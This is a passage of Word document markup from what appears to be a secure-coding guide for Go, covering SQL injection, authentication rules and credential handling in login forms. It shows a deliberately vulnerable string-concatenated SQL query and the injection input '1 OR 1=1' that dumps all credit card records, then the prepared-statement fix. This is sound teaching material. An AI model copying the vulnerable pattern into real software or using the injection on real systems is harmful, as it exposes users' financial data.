      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="23" w:name="SQL_Injection"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">ctx := context.Background()
customerId := r.URL.Query().Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"id"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
query := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT number, expireDate, cvv FROM creditcards WHERE customerId = "</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + customerId
row, _ := db.QueryContext(ctx, query)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>You're about to be exploited and subsequently breached.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For example, when provided a valid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>customerId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value you will only list that customer's credit card(s). But what if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>customerId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>1 OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Your query will look like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, expireDate, cvv </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> creditcards </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> customerId = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">... and you will dump all table records (yes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be true for any record)!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There's only one way to keep your database safe: </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Prepared Statements</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">ctx := context.Background()
customerId := r.URL.Query().Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"id"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
query := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT number, expireDate, cvv FROM creditcards WHERE customerId = ?"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">
stmt, _ := db.QueryContext(ctx, query, customerId)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notice the placeholder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>. Your query is now:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>readable,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>shorter and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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MySQL</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PostgreSQL</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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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WHERE col = ?</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WHERE col = $1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="auto" w:w="0"/>
            <w:shd w:color="auto" w:fill="FFFFFF"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WHERE col = :col</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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VALUES(?, ?, ?)</w:t>
            </w:r>
          </w:p>
        </w:tc>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VALUES($1, $2, $3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="auto" w:w="0"/>
            <w:shd w:color="auto" w:fill="F8F8F8" w:val="clear"/>
            <w:tcBorders>
              <w:top w:color="DDDDDD" w:sz="5" w:val="single"/>
              <w:right w:color="DDDDDD" w:sz="5" w:val="single"/>
              <w:bottom w:color="DDDDDD" w:sz="5" w:val="single"/>
              <w:left w:color="DDDDDD" w:sz="5" w:val="single"/>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pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="24" w:name="Authentication_and_Password_Management"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication and Password Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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25" w:name="Rules_of_Thumb"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Rules of Thumb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Let's start with the rules of thumb: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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0"/>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0"/>
        </w:rPr>
        <w:t>redirection to and from the centralized authentication control</w:t>
      </w:r>
      <w:r>
        <w:t>" should be used. Be careful handling redirection: you should redirect only to local and/or safe resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Authentication should not be used only by the application's users, but also by your own application when it requires "</w:t>
      </w:r>
      <w:r>
        <w:t>connection to external systems that involve sensitive information or functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>". In these cases, "</w:t>
      </w:r>
      <w:r>
        <w:t>authentication credentials for accessing services external to the application should be encrypted and stored in a protected location on a trusted system (e.g., the server). The source code is NOT a secure location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="26" w:name="Communicating_authentication_data"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Communicating authentication data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>In this section, "communication" is used in a broader sense, encompassing User Experience (UX) and client-server communication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Not only is it true that "</w:t>
      </w:r>
      <w:r>
        <w:t>password entry should be obscured on user's screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>",</w:t>
        <w:br w:clear="none"/>
        <w:t>but also the "</w:t>
      </w:r>
      <w:r>
        <w:t>remember me functionality should be disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can accomplish both by using an input field with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>type="password"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and setting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>autocomplete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attribute to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:hyperlink w:anchor="1__How_to_Turn_Off_Form_Autocompletion__Mozilla_D___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="27" w:name="1"/>
          <w:t>1</w:t>
          <w:bookmarkEnd w:id="27"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 17"/>
        <w:keepLines w:val="on"/>
      </w:pP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"passwd"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">autocomplete</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"off"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication credentials should be sent on HTTP POST requests only, using an encrypted connection (HTTPS). An exception to the encrypted connection may be the temporary passwords associated with email resets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Although HTTP GET requests over TLS/SSL (HTTPS) look as secure as HTTP POST requests, remember that in general, HTTP servers (eg. Apache</w:t>
      </w:r>
      <w:hyperlink w:anchor="2__Log_Files__Apache_Documentation__" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="28" w:name="2"/>
          <w:t>2</w:t>
          <w:bookmarkEnd w:id="28"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, Nginx</w:t>
      </w:r>
      <w:hyperlink w:anchor="3__log_format__Nginx_log_module__log_format__dire___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="29" w:name="3"/>
          <w:t>3</w:t>
          <w:bookmarkEnd w:id="29"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>) do write the requested URL to the access log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xxx.xxx.xxx.xxx - - [27/Feb/2017:01:55:09 +0000] "GET /?username=user&amp;password=70pS3cure/oassw0rd HTTP/1.1" 200 235 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>A well-designed HTML form for authentication would look like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 17"/>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"https://somedomain.com/user/signin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">autocomplete</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"off"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"hidden"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">name</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"csrf"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">value</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"CSRF-TOKEN"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">Username </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"text"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">name</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">Password </w:t>
      </w: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"password"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"submit"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">value</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Submit"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">form</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>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"https://somedomain.com/user/signin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">autocomplete</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"off"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"hidden"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">name</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"csrf"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">value</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"CSRF-TOKEN"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">div</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">class</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"error"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">p</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">Invalid username and/or password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">p</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">div</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">Username </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"text"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">name</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">Password </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">name</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">label</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"submit"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">value</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Submit"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;/</w:t>
        <w:t xml:space="preserve">form</w:t>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Using a generic message you do not disclose:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Who is registered: "Invalid password" means that the username exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How your system works: "Invalid password" may reveal how your application works, first querying the database for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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ractice" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>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2"/>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2"/>
        </w:rPr>
        <w:t>subtle.ConstantTimeCompare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with an empty value to compare it to the user input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0 Block"/>
      </w:pPr>
    </w:p>
    <w:p>
